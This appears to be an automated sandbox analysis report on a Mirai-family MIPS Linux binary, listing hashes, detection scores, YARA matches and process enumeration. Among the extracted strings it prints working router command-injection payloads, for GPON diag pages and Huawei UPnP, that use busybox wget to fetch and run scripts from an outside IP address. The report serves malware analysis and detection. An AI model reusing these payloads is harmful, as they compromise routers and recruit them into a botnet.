Linux Analysis Report
4wiwmAupak

Overview

General Information

Sample Name: 4wiwmAupak
Analysis ID: 679619
MD5: 234f833a57b2626dbd7992faf3c2a149
SHA1: 81915b94e27f542c1f8331a1f6b3317d82624805
SHA256: 4738edac99f86b857032b8c7fb640b6fe5cf4109ae0c3a6e56deb84b0a76d936
Tags: 32elfmipsmirai
Infos:

Detection

Mirai
Score: 64
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected Mirai
Multi AV Scanner detection for submitted file
Yara signature match
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Sample listens on a socket
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

AV Detection

barindex
Source: 4wiwmAupak Avira: detected
Source: 4wiwmAupak Virustotal: Detection: 61% Perma Link
Source: 4wiwmAupak Metadefender: Detection: 31% Perma Link
Source: 4wiwmAupak ReversingLabs: Detection: 63%
Source: /tmp/4wiwmAupak (PID: 6233) Socket: 127.0.0.1::44455 Jump to behavior
Source: 4wiwmAupak String found in binary or memory: http://0.0.0.0/Cloud/Cloud.x86
Source: 4wiwmAupak String found in binary or memory: http://46.23.109.47/Cloud/Cloud.mips;
Source: 4wiwmAupak String found in binary or memory: http://46.23.109.47/Cloud/Cloud.mpsl;chmod
Source: 4wiwmAupak String found in binary or memory: http://46.23.109.47/Cloud/Cloud.x86
Source: 4wiwmAupak String found in binary or memory: http://46.23.109.47/Cloud/Comtrend.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114
Source: 4wiwmAupak String found in binary or memory: http://46.23.109.47/Cloud/Dlink.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$
Source: 4wiwmAupak String found in binary or memory: http://46.23.109.47/Cloud/Gpon.sh
Source: 4wiwmAupak String found in binary or memory: http://46.23.109.47/Cloud/Netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VI
Source: 4wiwmAupak String found in binary or memory: http://purenetworks.com/HNAP1/
Source: 4wiwmAupak String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 4wiwmAupak String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: 4wiwmAupak, type: SAMPLE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6233.1.00007fd554464000.00007fd554466000.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6236.1.00007fd554464000.00007fd554466000.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6233.1.00007fd554400000.00007fd554424000.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6236.1.00007fd554400000.00007fd554424000.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: ELF static info symbol of initial sample .symtab present: no
Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+vaicalon;chmod+777+*;sh+vaicalon`&ipv=0
Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+anngu;chmod+777+*;sh+anngu`&ipv=0
Source: Initial sample String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://46.23.109.47/Cloud/Cloud.mips; chmod 777 Cloud.mips; ./Cloud.mips Cloud.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+anngu;chmod+777+*;sh+anngu`&ipv=0POST /HNAP1/ HTTP/1.0
Source: classification engine Classification label: mal64.troj.lin@0/0@0/0
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/1582/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/2033/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/2275/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/3088/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/6191/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/6192/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/1612/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/1579/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/1699/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/1335/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/1698/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/2028/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/1334/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/1576/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/2302/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/3236/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/2025/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/2146/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/910/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/912/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/517/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/759/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/2307/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/918/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/6241/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/6243/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/6242/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/4462/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/6245/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/6244/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/1594/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/2285/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/2281/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/1349/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/1623/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/761/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/1622/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/884/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/1983/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/2038/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/1344/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/1465/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/1586/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/1463/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/2156/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/800/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/6238/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/801/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/1629/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/1627/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/1900/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/6252/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/4470/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/6251/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/6253/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/6258/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/3021/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/491/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/2294/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/2050/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/6250/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/1877/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/772/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/1633/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/1599/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/1632/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/774/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/1477/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/654/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/896/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/1476/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/1872/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/2048/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/655/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/1475/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/2289/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/656/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/777/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/657/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/658/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/4467/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/4468/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/4469/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/419/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/936/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/1639/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/4503/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/1638/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/2208/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/2180/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/6262/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/6265/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/6266/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/1809/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/6268/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/1494/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/1890/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/2063/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/2062/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/1888/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/1886/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/420/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/1489/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/785/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6235) File opened: /proc/1642/exe Jump to behavior
Source: /tmp/4wiwmAupak (PID: 6233) Queries kernel information via 'uname': Jump to behavior
Source: 4wiwmAupak, 6233.1.0000562b48a4a000.0000562b48ad1000.rw-.sdmp, 4wiwmAupak, 6236.1.0000562b48a4a000.0000562b48ad1000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/mips
Source: 4wiwmAupak, 6233.1.00007ffc33963000.00007ffc33984000.rw-.sdmp, 4wiwmAupak, 6236.1.00007ffc33963000.00007ffc33984000.rw-.sdmp Binary or memory string: /usr/bin/qemu-mips
Source: 4wiwmAupak, 6233.1.0000562b48a4a000.0000562b48ad1000.rw-.sdmp, 4wiwmAupak, 6236.1.0000562b48a4a000.0000562b48ad1000.rw-.sdmp Binary or memory string: H+V!/etc/qemu-binfmt/mips
Source: 4wiwmAupak, 6233.1.00007ffc33963000.00007ffc33984000.rw-.sdmp, 4wiwmAupak, 6236.1.00007ffc33963000.00007ffc33984000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-mips/tmp/4wiwmAupakSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/4wiwmAupak

Stealing of Sensitive Information

barindex
Source: Yara match File source: 4wiwmAupak, type: SAMPLE
Source: Yara match File source: 6233.1.00007fd554400000.00007fd554424000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6236.1.00007fd554400000.00007fd554424000.r-x.sdmp, type: MEMORY

Remote Access Functionality

barindex
Source: Yara match File source: 4wiwmAupak, type: SAMPLE
Source: Yara match File source: 6233.1.00007fd554400000.00007fd554424000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6236.1.00007fd554400000.00007fd554424000.r-x.sdmp, type: MEMORY
No contacted IP infos